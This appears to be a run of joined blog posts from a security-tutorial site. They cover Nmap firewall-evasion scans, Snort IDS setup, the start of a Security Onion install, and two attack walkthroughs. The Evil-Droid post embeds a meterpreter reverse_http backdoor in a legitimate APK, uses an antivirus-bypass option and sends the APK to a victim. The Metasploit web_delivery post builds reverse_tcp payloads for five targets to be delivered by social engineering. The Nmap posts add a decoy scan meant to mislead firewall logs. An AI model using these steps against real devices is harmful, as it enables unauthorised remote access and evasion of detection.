Hello friends, several times you might have used NMAP to performing Network scanning for enumerating active Port services of target machine but in some scenario it is not possible to perform scanning  with help of basic scan method especially in case of firewall filter.

Today we are going to demonstate “Nmap firewall scan” by making use of Iptable rules and try to bypass firewall filter to perfrom NMAP Advance scanning. 

Let’s Begin!!

Attacker’s IP: 192.168.0.107 [kali linux]

Target’s IP: 192.168.0.101 [ubuntu]

ANALYSIS TCP SCAN

Open the terminal in your kali linux and execute following command to perform TCP[sT] scan for open port enumeration.

nmap -sT -p22 192.168.1.101

From given below image you can observe we had scanned port 22 as result it has shown Port 22 is Open for SSH service.

When you will use wireshark in order to capture the packet send in the case of TCP while network is being scanning , here you need to notice few things such as “flag,Total length and time to live[TTL]” [in layer3].

Following table contains detail of Flag, Data length and TTL in diffrent scanning method:

Following image of wireshark is use to describe network traffic generated while nmap TCP scan is running, here 1st stream indicates SYN packet which contain following information:

Total Length: 60 [data length excluding 14 bytes of Ethernet]

Time to live: 64 [it is maximum ttl of linux system in tcp communication]

Reject SYN Flag with IPTables

As we know there is strong fight between security researcher and attacker, to increase network security admin will  apply firewall filter which will now prevent 3 way handshak communication in network and resist attacker to perfrom TCP scan by rejecting SYN packet in network.              

Execute given below command in ubuntu to block SYN packet:  

iptables -I INPUT -p tcp –tcp-flags ALL SYN -j REJECT –reject-with tcp-reset

Iptable work as firewall in linux operating system and above iptable rule will reject SYN packet to prevent TCP scan.

Now when SYN packet has been reject by firewall in target network, then attacker will be unable to enumerate open port of target’s network even if services are activated.

Now when again we [attacker] have executed TCP scan then it found Port 22 is closed as shown in given image.

Bypass SYN Filter

When attacker fails to enumerate open port using tcp scan. Then there are some advance scaning methods used to bypass such type of firewall filter as given below :

FIN Scan

A FIN packet is used to terminate the TCP connection between source and destination port typically after the data transfer is complete. In the place of a SYN packet, Nmap start a FIN scan by sending FIN packet.  

Fin Scan only works on Linux machine and does not work on latest version of windows

nmap -sF -p 22 192.168.0.101

From given image you can observe the result that port 22 is open.

When you will capture network traffic for FIN packet, you can bear out “data length” is 40 and “TTL” will be less than 64 every time moreover there is no use of SYN packet to establish TCP communication with target machine.

NULL Scan

A Null Scan is a series of TCP packets which hold a sequence number of “zeros” (0000000) and since there are none flags set, the destination will not know how to reply the request. It will discard the packet and no reply will be sent, which indicate that port is open.

Null Scan are only workable in Linux machines and does not work on latest version of windows

nmap -sN -p 22 192.168.0.101

From given image you can observe the result that port 22 is open.

Similarly When you will capture network traffic for NULL packet, you can bear out “data length” is 40 and “TTL” will be less than 64 every time, here also there is no use of SYN packet to establish TCP communication with target machine.

XMAS Scan

These scans are designed to manipulate the PSH, URG and FIN flags of the TCP header, Sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree. When source sent FIN, PUSH, and URG packet to specific port and if port is open then destination will discard the packets and will not sent any reply to source.

Xmas Scan are only workable in Linux machines and does not work on latest version of windows

nmap -sX -p 22 192.168.0.101

From given image you can observe the result that port 22 is open.

Similarly When you will capture network traffic for xmas scan you will get combination of FIN, PSH and URG flags, here also you can bear out “data length” is 40 and “TTL” will be less than 64 every time.

Conclusion: TCP connection established by 3 way handshak and if firewall discard 3 way handshak to prevent TCP communication then FIN, NULL and XMAS scan are used forTCP connection.  

Reject  FIN Packet Using IPTABLES Rule

Again admin add a new firewall filter to Prevent Netwok enumration from Fin scan which will reject FIN packet in network.

Execute given below command in ubuntu to block FIN packet:

iptables -I INPUT -p tcp –tcp-flags ALL FIN -j REJECT –reject-with tcp-reset

Now when attacker will try to perfrom advancet scan through FIN scan then he will not able to enumerate open port information which you can confirm from given below image.

At present only Null and Xmas will helpful to perfrom port enumeration untill unless admin has not block traffic coming from these scan. From given below image you can confirm that port 22 is close when Fin scan is perfromed while open when Null and Xmas is perfromed.

To prevent you network from NULL and Xmas scan too, apply given below iptables rule for Null and Xmas respectively:

iptables -I INPUT -p tcp –tcp-flags ALL NONE -j REJECT –reject-with tcp-reset

iptables -I INPUT -p tcp –tcp-flags ALL FIN,PSH,URG -j REJECT –reject-with tcp-reset

Reject  Data-length with IPTables

As I had discussed above TCP communication based upon 3 factors i.e. “Flag” which I had demonstrated above, “TTL” which I will demonstrate later and “Data length” which I am going to demonstrate.     

So now when admin wants secure again his network from TCP scan, instead of applying firewall filter on TCP-flags he can also apply firewall rule to check “data length” of specific size and then stop the incoming network traffic for TCP connection. Execute given below command to apply firewall rule on “data length”; by default 60 is data length use for TCP scan which you can confirm from table given above.

iptables -I INPUT -p tcp -m length –length 60 -j REJECT –reject-with tcp-reset

Now when data length of 60 bytes has been block by firewall in target network then attacker will be unable to enumerate open port of target even if service is activated.

Now when again we [attacker] had executed TCP scan then it has found Port 22 is closed as shown in given image.

Bypass Data-Length Restriction with Stealth Scan

When attacker fail to enumerate open port using TCP [sT] scan then there are some scanning method used to bypass such type of firewall filter as given below:

nmap -sS -p 22 192.168.0.101

From given below image you can observe port 22 is open when stealth scan[sS] is executed, this is because the data length send by stealth scan is 44 by default for TCP connection.

Stealth scan is much similar to TCP scan and also known as “half open” scanning because it send SYN packet and as response receives SYN/ACK packet from listening port and dump result without sending ACK packet to listening port. Therefore if “SYN packet” is block by firewall this scan gets failed, this scan is only applicable in case of data length = 60 is block or TTL = 64 is block by firewall.

Fragment Scan

The -f option causes the requested scan to use tiny fragmented IP packets. The idea is to split up the TCP header over several packets to make it harder for packet filters, intrusion detection systems, and other annoyances to detect what you are doing. So a 20-byte TCP header would be split into three packets, two with eight bytes of the TCP header, and one with the final four.

nmap -f -p22 192.168.0.101

When you will capture network traffic, you can bear out “data length” is 28 excluding 14 bytes of Ethernet and “TTL” will be less than 64 every time.

Similarly you use Fin, Null and Xmas scan whose data length is 40 to enumerate open port of target network.

If admin will apply firewall filter to reject data length 40,44 and 60 then it will not allow attacker to perform above all scan either basic scan or advance scan by executing following iptables rules.

iptables -I INPUT -p tcp -m length –length 60 -j REJECT –reject-with tcp-reset

iptables -I INPUT -p tcp -m length –length 44 -j REJECT –reject-with tcp-reset

iptables -I INPUT -p tcp -m length –length 40 -j REJECT –reject-with tcp-reset

From given below image you can observe now Fin, null, Xmas and sleath scan are some examples which were unable to enumerate open port of target netwok. All are showning port is close even if service is activated.

Data Length Scan

When attacker is unable to enumerate open port by applying above scan then he should go with nmap “data-length scan” which will bypass above firewall filter too.

By default nmap scan has fix data length as explain above, this scan let you append the random data length of your choice.

Using following command attacker is trying enumerate open port by defining data length 12

nmap —data-length 12 -p 22 192.168.0.101

Awesome!! From given below image you can observe port 22 is open.

So when you will use wireshark to capture network traffic generated while this scan has been executed you will get “Total length” for Tcp is 44.

Size of SSH packet is 70 bytes; now reduce 14 bytes from its of Ethernet then remains 56 byte; now reduce 12 bytes of data length which you have define at last total length will 44 bytes left.

Here, 70 bytes -14 bytes[Ethernet] = 56 bytes

Now, 56 bytes -12 bytes[data-length] = 44 bytes

Reject Length size 1 to 100

If admin is aware from nmap data-length scan then he should block a complete range of data length to prevent network scanning from attacker by executing following iptable rule.

iptables -I INPUT -p tcp -m length –length 1:100 -j REJECT –reject-with tcp-reset

Now firewall will analysis traffic coming on its network then reject the packet which contains data-length from 1 byte to 100 bytes and deny to establish TCP connections with attacker. 

Now if attacker sends data-length between 1 byte to 100 bytes the port scanning gets failed to enumerate its open state which you can confirm from given below image when data length 12 bytes and 10 bytes is sent in both scan, port 22 is closed. As soon as attacker sent data-length of 101 bytes which is more than 100 bytes, port 22 gets open.

TTL Scan

Reject TTL size with IPTables

After applying firewall filter on “TCP flags” and “data length” to secure network from enumeration now add firewall filter for “Time To Live” i.e. TTL.

If you had notice the table given in beginning of article you will observe that only TCP Scan [sT] has TTL value equal to 64 else remaining scan has TTL value less than 64 every time, hence if admin applies firewall filter to reject TTL value 64 then it will prevent network from TCP scanning.  

Given below command will add a new firewall rule to check TTL value of 64 and reject the packet.

iptables -I INPUT -p tcp -m ttl –ttl 64 -j REJECT –reject-with tcp-reset

Now if attacker use “TCP [sT] scan” to enumerate port information, it will always show “port is closed”, else if other scan is perfromed the attacker will get accurate information related to port state. From given below image you can observe when “basic scan is execute” to enumerate port details it give “port 22 is open”.

This happen because the TTL value for “basic scan” is less than 64 and firewall of target machine will reject only TTL value equal to 64. When we had captured network traffic generated while this scan has been executed then we found TTL value is 56 used in basic scan.

Now admin has added one more step of security to prevent his network from entire type scanning by rejecting TTL value of 64 and less than 64.

iptables -I INPUT -p tcp -m ttl –ttl-lt 64 -j REJECT –reject-with tcp-reset

Now firewall will analysis the traffic coming on his network and blocks the packet contains TTL 64 or less than it.

Bravo!! Above firewall rule is more powerful than the previous rules because it has complete block NMAP “basic scan” as well as “advance scan”, if you notice given below image then you will observe that TCP [sT], Fin Scan [sF], Data-length, Sealth [sS] Scan all have been failed and showing port is closed.

Still there is second way to enumerate port for accurate result, by setting TTL value grather than 64. Following command will perform port scan with defined TTL value i.e. 65 which will bypass firewall filter as 65 is greater than 64.

nmap -p22 –ttl 65 192.168.0.101

So if attacker is lucky to guess rejected TTL value or firewall rule and applied correct TTL ,then only port enumeration will get successful as shown in given image port 22 is open.

Source Port Scan

Source Port Filter with IPTables

One more step to secure network from scanning is to apply firewall rule to allow traffic from a specific port only and reject traffic from remaining ports.

iptables -I INPUT -p tcp –sport 80 -j  ACCEPT

iptables -A INPUT -p tcp -j  REJECT –reject-with tcp-reset

Now again NMAP basic and advance will fail to enumerate open port state and if attacker made correct gusses again firewall filter then he can excute NMAP source port scan to enumerate port details.

The option g is used to define source port which will carry network packet to destination port.

nmap -g 80 192.168.0.101

Above command will send traffic from port 80 to perfrom scanning hence firewall will allow traffic from source port 80 and as result show state for open ports.

Decoy Scan

Set Firewall Log to capture Attacker IP

Admin can set firewall rule to create Log for IP from which traffic is coming, it will only create system logs to capture the attacker IP who is performing scanning.

iptables -I INPUT -p tcp -j LOG –log-prefix “kaliNmap” –log-level=4

Now if attacker will perform any type network scanning on targeted system then firewall will generate its log which will capture his IP.

Escape from Firewall log

Always use some kind of precaution to escape yourself while performing network scanning because in windows “honey pot” and in Linux “iptables” are firewall will make log of attacker’s IP. In such situation you are suggested to use Decoy Scan for port enumeration.

Decoy Scan

The -D option makes it look like trick scanning the target network. It does not hide your own IP, but it makes your IP one of a torrent of others supposedly scanning the victim at the same time. This not only makes the scan look scarier, but reduces the chance of you being trace from your scan (difficult to tell which system is the “real” source).

nmap -D 216.58.203.164 192.168.0.101

In above command we had use Google IP as a torrent which will reflect as attacker IP in firewall log.

tail -f /var/log/syslog

When admin will read system log then he will take higlighted IP as attacker’s IP and may apply filter on this IP to block incoming traffic from it.

The post Understanding Guide to Nmap Firewall Scan (Part 1) appeared first on Hacking Articles.

Hello friends! Today you will learn how to generate apk payload with help of “Evil-Droid”. It is the tool use to compromise any android deceive for attacking point, we are using it only for educational purpose.

Evil-Droid is a framework that creates & generates & embed apk payload to penetrate android platforms.

Requirement:

Attacker: Kali Linux

Target: Android

Lets Begin !!

Open the terminal in your kali Linux and execute given below command to download it from git hub.

git clone https://github.com/M4sc3r4n0/Evil-Droid.git

Now open the downloaded folder in terminal and type given below command to give all permission to the script “evil-droid”

chmod 777 evil-droid

Now execute given below command to run the script and lunch the evil-droid application.

./evil-droid

When you will execute above command evil-droid will start as shown in given below image. Here it will start from testing internet connection and its dependencies from available kali Linux tool by its own.

Then a prompt will pop up to confirm Evil droid framework requirement, here select option “yes”.

Now Evil droid framework will get open to hack remote android platform by execute given below options.

[1] APK MSF                                    

[2] BACKDOOR APK ORIGINAL (OLD)                

[3] BACKDOOR APK ORIGINAL (NEW)                

[4] BYPASS AV APK (ICON CHANGE)                

[5] START LISTENER                             

[c] CLEAN                                       

[q] QUIT                                       

[?] Select

From given below image you can perceive that we had choose option as “BACKDOOR APK ORIGINAL”

After that again a prompt will pop up in order to set LHOST [attacker’s IP] for reverse connection. Enter your kali Linux IP in given text field as shown in given below image.

After that again a prompt will pop up in order to set LPORT for reverse connection as shown in given below image.

In next prompt enter payload name you want to give to your apk payload as shown in given below image. Here I had given baidu-broswer name to my payload.

Now when everything is set by attacker for generating an apk payload at last he will get a list for payload option to choose type of payload he wants to generate as shown in given below image.

Here I had selected “android/meterpreter/reverse_http” as payload.

Now download any original apk file from Google in order to hide your payload in that file. Here I had downloaded baidu.apk to hide my baidu-browser payload inside it; you can download any other apk file of your choice.

This will now generate a malicious baidu.apk by hiding our backdoor inside it as shown in given below image. Now copy this malicious apk from given path /root/Evil-Droid/evilapk/baidu-browser.apk and send it to victim.

On other hand another prompt will pop up to choose following option:

• Multi-Handler
• Attack-vector
• Main menu
• Exit

From given below image you can observe that I had choose “multi handler” for reverse connection of victims system.

Now it will lunch multi-handler and start reverse TCP handler on attacker machine as shown in given below image. As soon as victim will download and run the malicious baidu.apk, attacker will get unauthorized access of his deceive on his machine.

Great!! From given below image you can observe meterpreter session 1 is opened

meterpreter> sysinfo

Author: Sanjeet Kumar is a Information Security Analyst | Pentester | Researcher  Contact Here

The post Android Mobile Exploitation with Evil-Droid appeared first on Hacking Articles.

Hello friends! As you people must be aware of various types of security issues facing by IT sector originations daily. There are so many types of firewall and IDS or third party software available to shoot out major different types of security issues in the network.

In this article you will learn how to configure the famous “SNORT as IDS” of IT sector originations which work as real-time machine.

Snort is software created by Martin Roesch, which is widely use as Intrusion Prevention System [IPS] and Intrusion Detection System [IDS] in network. It is separated into the five most important mechanisms for instance: Detection engine, Logging and alerting system, Packet decoder, Preprocessor and Output modules.

The program is quite famous to carry out real-time traffic analysis, also used to detect query or attacks, packet logging on Internet Protocol networks, to detect malicious activity, denial of service attacks and port scans by monitoring network traffic, buffer overflows, server message block probes, and stealth port scans.

Snort can be configured in three main modes:

• Sniffer mode: it will observe network packets and present them on the console.
• Packet logger mode: it will record packets to the disk.
• Intrusion detection mode: the program will monitor network traffic and analyze it against a rule set defined by the user.

After that the application will execute a precise action depend upon what has been identified.

Let’s Begin!!

Snort Installation

We had chosen ubuntu 14.04 operating system for installation and configuration of snort. Earlier than installing snort in your machine, you should need to install necessary dependencies of ubuntu. Therefore open the terminal and type given below command to install pre-requisites:

sudo apt-get install -y build-essential libpcap-dev libpcre3-dev libdumbnet-dev bison flex zlib1g-dev

Now create a folder to download snort and its dependencies package inside. Type given below commands to create a folder “snort-src” and move inside it to download DAQ-2.0.6

mkdir ~/snort_src && cd ~/snort_src

wget https://snort.org/downloads/snort/daq-2.0.6.tar.gz

Snort need to set up the DAQ, or Data Acquisition library, for packet I/O.  The DAQ change direct calls into lib pcap functions with an abstraction layer that facilitates operation on a variety of hardware and software interfaces without requiring changes to Snort.  It is possible to select the DAQ type and mode when invoking Snort to perform pcap read back or inline operation, etc.  The DAQ library may be useful for other packet processing applications and the modular nature allows you to build new modules for other platforms.

From given below image you can confirm that we had successfully downloaded daq-2.0.6 tar file.

Now execute given below command to extract tar file.

tar xvfz daq-2.0.6.tar.gz

Move inside daq-2.0.6 folder by executing given below first command and then execute second command for automatically installation and configuration.

cd daq-2.0.6

./configure && make && sudo make install

Till here you had learn how install daq-2.0.6 for snort.

Now again move into snort-src folder and type given below command to download latest version of snort-2.9.11

wget https://snort.org/downloads/snort/snort-2.9.11.tar.gz

From given below image you can confirm that we had successfully downloaded snort-2.9.11 tar file.

Now execute given below command to extract tar file.

tar xvfz snort-2.9.11.tar.gz

Move inside snort-2.9.11 folder by executing given below first command and then execute second command for automatically installation and configuration.

cd snort-2.9.11

./configure –enable-sourcefire && make && sudo make install

Run following command to manage and install shared libraries

sudo ldconfig

Type given below command for generating symbolic link

sudo ln -s /usr/local/bin/snort /usr/sbin/snort

A symbolic link also known as soft link is a file system entry that points to the file name and location. Deleting the symbolic link does not remove the original file. If, on the other hand, the file to which the soft link point is removed, the soft link stops working, it is broken.

Now execute given below command that snort to verify itself by testing its installation and configuration.

snort –V

The first part of snort installation finished here

Configure Snort to in IDS Mode in Network

Execute given below command to create the snort user and group, where snort will run as an unprivileged user.

sudo groupadd snort

sudo useradd snort -r -s /sbin/nologin -c SNORT_IDS -g snort

Above command will create a group as “snort” and add a member “snort” into it.

Now further we need to make some directories which Snort suppose at the timing of running in IDS mode in network. Snort stores configuration files in /etc/snort; rules in /etc/snort/rules; store compile rules in  /usr/local/lib/snort_dynamicrules, and stores its logs in /var/log/snort:

Type given below command to create the Snort directories:

sudo mkdir /etc/snort

sudo mkdir /etc/snort/rules

sudo mkdir /etc/snort/rules/iplists

sudo mkdir /etc/snort/preproc_rules

sudo mkdir /usr/local/lib/snort_dynamicrules

sudo mkdir /etc/snort/so_rules    

Type given below command to create some files that stores rules and ip lists

sudo touch /etc/snort/rules/iplists/black_list.rules

sudo touch /etc/snort/rules/iplists/white_list.rules

sudo touch /etc/snort/rules/local.rules

sudo touch /etc/snort/sid-msg.map

Type given below command to create our logging directories:

sudo mkdir /var/log/snort

sudo mkdir /var/log/snort/archived_logs

Type given below command to adjust permissions:

sudo chmod -R 5775 /etc/snort

sudo chmod -R 5775 /var/log/snort

sudo chmod -R 5775 /var/log/snort/archived_logs

sudo chmod -R 5775 /etc/snort/so_rules

sudo chmod -R 5775 /usr/local/lib/snort_dynamicrules

Snort required some configuration files and the dynamic preprocessors to be copied from the Snort source folder into the /etc/snort folder therefore execute given below command for that.

cd snort_src/snort-2.9.11/etc/

sudo cp *.conf* /etc/snort

 sudo cp *.map /etc/snort

 sudo cp *.dtd /etc/snort

cd snort_src/snort-2.9.11/src/dynamic-preprocessors/build/usr/local/lib/snort_dynamicpreprocessor/

sudo cp * /usr/local/lib/snort_dynamicpreprocessor/

Editing snort configuration file

Now we need to comment out all rulesets with the following command:

sudo sed -i “s/include \$RULE\_PATH/#include \$RULE\_PATH/” /etc/snort/snort.conf

After then open the configuration file using gedit for making some changes inside.

sudo gedit /etc/snort/snort.conf

Scroll down the text file near line number 45 to specify your network for protection as shown in given image.

#Setup the network addresses you are protecting

 ipvar HOME_NET 192.168.1.1/24 

Now again scroll down near line number 108 to set the path of your rule file which you had created above for storing snort rules, as shown in given below image.

var RULE_PATH /etc/snort/rules

var SO_RULE_PATH /etc/snort/so_rules

var PREPROC_RULE_PATH /etc/snort/preproc_rules

var WHITE_LIST_PATH /etc/snort/rules/iplists

var BLACK_LIST_PATH /etc/snort/rules/iplists

One more time scroll down the text near line number 546 to uncomment highlighted text.

include $RULE_PATH/local.rules   

Save the file and close it once all the editing is done in snort configuration file. 

Now once again we need to verify its configuration setting therefore execute following command to test it.

sudo snort -T -i eth0 -c /etc/snort/snort.conf

Now it will compile the complete file and test the configuration setting automatically as shown in given below image:

Great!! We had successfully configured snort as IDS for protecting our network.

Reference link

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post IDS, IPS Penetration Testing Lab Setup with Snort appeared first on Hacking Articles.

Hello friends! In this article you will learn how to exploit three different platform [Linux, windows, using single exploit of metasploit framework.

Requirement

Attacker:Kali Linux

Targeted platform: Window,PHP,Linux[ubuntu]

Open the terminal in your kali Linux and type “msfconsole” to load metasploit framework and execute given below exploit.

This module quickly fires up a web server that serves a payload. The provided command which will allow for a payload to download and execute. It will do it either specified scripting language interpreter or “squiblydoo” via regsvr32.exe for bypassing application whitelisting. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command: e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Execution. This attack vector does not write to disk so it is less likely to trigger AV solutions and will allow privilege escalations supplied by Meterpreter. When using either of the PSH targets, ensure the payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines. Regsvr32 uses “squiblydoo” technique for bypassing application whitelisting. The signed Microsoft binary file, Regsvr32, is able to request an .sct file and then execute the included PowerShell command inside of it. Both web requests (i.e., the .sct file and PowerShell download/execute) can occur on the same port. “PSH (Binary)” will write a file to the disk, allowing for custom binaries to be served up to be downloaded/executed.

use exploit/multi/script/web_delivery

msf exploit (web_delivery)>show targets

From given below image you can observe that there are 5 targets, which help you in generating malicious code to create backdoor in victim system.

Exploit Linux Platform [python]

use exploit/multi/script/web_delivery

msf exploit (web_delivery)>set lhost 192.168.1.132 (IP of Kali Linux)

msf exploit (web_delivery)>set lport 4444

msf exploit (web_delivery)>set target 0

msf exploit (web_delivery)>set payload python/meterpreter/reverse_tcp

msf exploit (web_delivery)>run

In this exploit we had set target 0 to generate malicious code for python platform, from given below image you can observe the highlighted malicious python code, now copy it and send to victim using social engineering method.

As soon as victim will execute the malicious code in terminal, attacker will obtain meterpreter session as unauthorized access of victim system.

Exploit Linux Platform [PHP]

use exploit/multi/script/web_delivery

msf exploit (web_delivery)>set lhost 192.168.1.132 (IP of kali Linux)

msf exploit (web_delivery)>set lport 4444

msf exploit (web_delivery)>set target 1

msf exploit (web_delivery)>set payload php/meterpreter/reverse_tcp

msf exploit (web_delivery)>run

Now we had set target 1 to generate malicious code for php platform, from given below image you can observe the highlighted malicious php code, now copy it and send to victim using social engineering method.

As soon as victim will execute the malicious code in web browser, attacker will obtain another meterpreter session as unauthorized access of victim system.

Exploit Windows Platform [exe]

use exploit/multi/script/web_delivery

msf exploit (web_delivery)>set lhost 192.168.1.132

msf exploit (web_delivery)>set lport 4444

msf exploit (web_delivery)>set target 2

msf exploit (web_delivery)>set payload windows/meterpreter/reverse_tcp

msf exploit (web_delivery)>run

Further we had set target 2 to generate malicious code for window platform, from given below image you can observe the highlighted malicious powershell.exe, now copy it and send to victim using social engineering method.

As soon as victim will execute the malicious code in command prompt, attacker will obtain meterpreter session as unauthorized access of victim system.

Exploit Windows Platform [DLL]

use exploit/multi/script/web_delivery

msf exploit (web_delivery)>set lhost 192.168.1.132

msf exploit (web_delivery)>set lport 4444

msf exploit (web_delivery)>set target 3

msf exploit (web_delivery)>set payload windows/meterpreter/reverse_tcp

msf exploit (web_delivery)>run

In this exploit we had set target 3 to generate malicious code for window platform, from given below image you can observe the highlighted malicious dll code, now copy it and send to victim using social engineering method.

As soon as victim will execute the malicious code as run command inside RUN window, attacker will again obtain meterpreter session, and make an unauthorized access in victim system.

Exploit Windows Platform [Powershell Binary]

use exploit/multi/script/web_delivery

msf exploit (web_delivery)>set lhost 192.168.1.132

msf exploit (web_delivery)>set lport 4444

msf exploit (web_delivery)>set target 4

msf exploit (web_delivery)>set payload windows/meterpreter/reverse_tcp

msf exploit (web_delivery)>run

In this exploit we had set target 4 to generate malicious code for windows platform, from given below image you can observe the highlighted malicious powershell.exe binary code, now copy it and send to victim using social engineering method.

As soon as victim will execute the malicious code in command prompt, attacker will obtain meterpreter session as unauthorized access of victim system.

Hence a single exploit “web delivery script” is quite helpful to hack three different platforms.

Author: Sanjeet Kumar is a Information Security Analyst | Pentester | Researcher  Contact Here

The post Command Injection Exploitation using Web Delivery (Linux, Windows) appeared first on Hacking Articles.

In our previous article we had demonstrated “Nmap firewall scan (part 1)” by making use of Iptable rules and then try to bypass firewall filter to perform NMAP Advance scanning, today we are going to discuss second part of it.  

Requirement

Attacker: Kali Linux

Target: Ubuntu  

Spoof MAC Address Scan

Allow TCP Packet from Specific Mac Address

If network admin wants to establish TCP connect from specific MAC address and do not want to connect with other system then he could use following Iptable rules to apply firewall filter in his network.  

iptables -I INPUT -p tcp -m mac –source-mac “AA:AA:AA:AA:AA:AA” -j ACCEPT

iptables -I INPUT -p tcp -j REJECT –reject-with tcp-reset

Now when attacker will perform basic network scanning on target’s network, he could not able to enumerate ports and running service of victim’s system.

nmap 192.168.1.117

In order to bypass above applied filter attacker may run netdiscover command or nmap Host Scan in Kali Linux terminal to identify the active host in the network. As result he will get a table which contains MAC address and IP address of active host in local network.

Now either use one by one all MAC address in nmap command or save all MAC address in a text file and give its path in nmap command but to perform this attacker first need to enable “Promiscuous mode” of his network. Well, to do so type given below commands first for Promiscuous mode and second for nmap scanning.

ip link set eth0 promisc on

nmap –spoof-mac AA:AA:AA:AA:AA:AA 192.168.1.117

Hence if you are lucky to spoof correct Mac address then you can easily bypass the firewall filter and able to establish TCP connect with victim’s network for port enumeration.

Nice!!! If you will notice in given below image you will observe open ports of target’s network.

Allow TCP Packet from Specific IP

If network admin wants to establish TCP connect from specific IP and do not want to connect with other system then he could use following Iptable rules to apply firewall filter in his network. 

iptables -I INPUT -p tcp -j REJECT –reject-with tcp-reset

iptables -I INPUT -p tcp -s 192.168.1.120 -j ACCEPT

Now when again attacker will perform basic network scanning on target’s network, he could not able to enumerate ports and running service of victim’s system.

nmap 192.168.1.117

Spoof IP Address

In order to bypass above applied filter attacker may again run netdiscover command or nmap Host Scan in Kali Linux terminal to identify the active host in the network. As result he will get a table which contains MAC address and IP address of active host in local network.

Now either use one by one all IP address in nmap command or save all IP address in a text file and give its path in nmap command and then execute following command:

nmap -e eth0 -S 192.168.1.120 192.168.1.117

Hence if you are lucky to spoof correct IP address then you can easily bypass the firewall filter and able to establish TCP connect with victim’s network for port enumeration.

Great!! If you will notice in given below image you will observe open ports of target’s network.

Data-String Scan

Allow TCP Packet from Specific String

If network admin wants to establish TCP connect from a system which contain specific string and do not want to connect with other system does not contain that special string packets then he could use following Iptable rules to apply firewall filter in his network. 

iptables -I INPUT -p tcp -m string –algo bm –string “Khulja sim sim” -j ACCEPT

iptables -A INPUT -p tcp -j REJECT –reject-with tcp-reset

In above rule you can see we had used “Khulja sim sim” as special string to establish TCP connection. Hence only those TCP connection could be establish which contain “Khulja sim sim”in packets.

Now when again attacker will perform basic network scanning on target’s network, he could not able to enumerate ports and running service of victim’s system because traffic generate from his network does not contain special string in packets thus firewall of target system will discard all TCP packet of attacker’s network.

nmap 192.168.1.117

If attacker somehow sniffs special string “khulja sim sim” to connect with target’s network then he could use –data-string argument in nmap command to bypass the firewall.

nmap –data-string “Khulja sim sim” 192.168.1.117

Hence if you are lucky to sniff correct data string then you can easily bypass the firewall filter and able to establish TCP connect with victim’s network for port enumeration.

Wonderful!! If you will notice given below image you will observe open ports of target’s network.

Hex String Scan

Allow TCP Packet from Specific Hex String

If network admin wants to establish TCP connect from a system which contain hexadecimal value of particular string and do not want to connect with other system does not contain hexadecimal value of that special string in packets then he could use following Iptable rules to apply firewall filter in his network. 

iptables -I INPUT -p tcp -m string –algo kmp –hex-string “RAJ” -j ACCEPT

iptables -A INPUT -p tcp -j REJECT –reject-with tcp-reset

In above rule you can see we had used hex value for “RAJ” as special string to establish TCP connection. Hence only those TCP connection could be established which contain hex value of “RAJ” in packet.

Now when again attacker will perform basic network scanning on target’s network, he could not able to enumerate ports and running service of victim’s system because traffic generate from his network does not contain hex value of special string in packets thus firewall of target system will discard all TCP packet of attacker’s network.

nmap 192.168.1.117

If attacker somehow sniffs special string “RAJ” to connect with target’s network then he could used its hex values with –data argument in nmap command to bypass the firewall.

nmap –data “\x52\x41\x4a” 192.168.1.117

Hence if you are lucky to sniff correct hex value of particular data string then you can easily bypass the firewall filter and able to establish TCP connect with victim’s network for port enumeration.

Hence, if you will notice given below image you will observe open ports of target’s network.

IP-Options Scan

Reject TCP Packets contains tcp-option

By default nmap sends 24 bytes of TCP data in which 4 bytes of data is reserve for TCP Options if network admin reject 4 bytes tcp –option packet to discord tcp connection to prevent his network from scanning. Type following iptable rule to reject 4 bit tcp-option in his network:

 iptables -A INPUT -p tcp –tcp-option 4  -j REJECT –reject-with tcp-reset

Now when attacker will perform TCP scanning [sT] on target’s network, he could not able to enumerate ports and running service of victim’s system. Since tcp-option is 4 bytes hence firewall discard tcp packet of attacker’s network.

nmap -sT 192.168.1.117

The IP protocol gives numerous options that could be placed in packet headers. Contrasting the omnipresent TCP options, IP options are seldom observed because of security reasons. The most powerful way to specify IP options is to simply pass in hexadecimal data as the argument to –ip-options.

Precede every hex byte value with \x. You may repeat certain characters by following them with an asterisk and then the number of times you wish them to repeat. For example, \x01\x07\x04\x00*4 is the same as\x01\x07\x04\x00\x00\x00\x00 this is also called NuLL bytes

Now type following command with ip-option argument as shown below:

nmap –ip-option “\x00\x00\x00\x00\x00*” 192.168.1.117

Note that if you denote a number of bytes that is not a multiple of four; an incorrect IP header length will be set in the IP packet. The reason for this is that the IP header length field can only express multiples of four. In those cases, the length is computed by dividing the header length by 4 and rounding down. 

GOOD! If you will notice given below image you will observe open ports of target’s network.

https://nmap.org/book/nping-man-ip-options.html

The post Understanding Guide to Nmap Firewall Scan (Part 2) appeared first on Hacking Articles.

Security Onion is a Linux distro for intrusion detection, network security monitoring, and log management. It’s based on Ubuntu and contains Snort, Suricata, Bro, OSSEC, Sguil, Squert, ELSA, Xplico, NetworkMiner, and many other security tools. The easy-to-use Setup wizard allows you to build an army of distributed sensors for your enterprise in minutes!

Security Onion effortlessly merges collectively two main roles i.e. complete packet capture another Network-based [NIDS] and host-based intrusion detection systems [HIDS].

There are some Analysis tool are available that also work as real time program by capturing network packets.

NIDS: Snort or Suricata and Bro as network intrusion detection for fingerprints and identifiers that contest identified malicious, abnormal otherwise suspicious traffic.

HIDS:  Security Onion offers OSSEC for host-based intrusion detection.

Sguil: It is the crucial Security Onion tool for network security analysts. Sguil’s main component is an intuitive GUI that gives access to real-time events, session data, and raw packet captures.

Squert: It is a web application that is used to query and view event data stored in a Sguil database.

ELSA: Enterprise Log Search and Archive is a three-tier log receiver, archiver, indexer, and web frontend for incoming syslog. 

For more details visit here

Let’s start!!

Create VM for Security Onion installation

Open vmware, select option “creates new virtual machine”, now for install from wizard select second option:

Install disc image file in order to browser iso file of security onion.

Then click on next.

Now select 2nd option “Linux” for guest operating system and select version “ubuntu”. Then click on next and next as per your requirements.

Explore custom hardware for making following changes:

Select bridges connection and enable the check box for replicate connection for network adapter setting. Similarly add one more network adapter and also select bridges connection for 2^nd adapter

Then click on finish.

Installation

It will start booting the vm automatically, now for SECURITY ONION

At welcome screen; Select language and click “Continue”. Here we have chosen English as preferred language.

Read the content and then click on “Continue”.

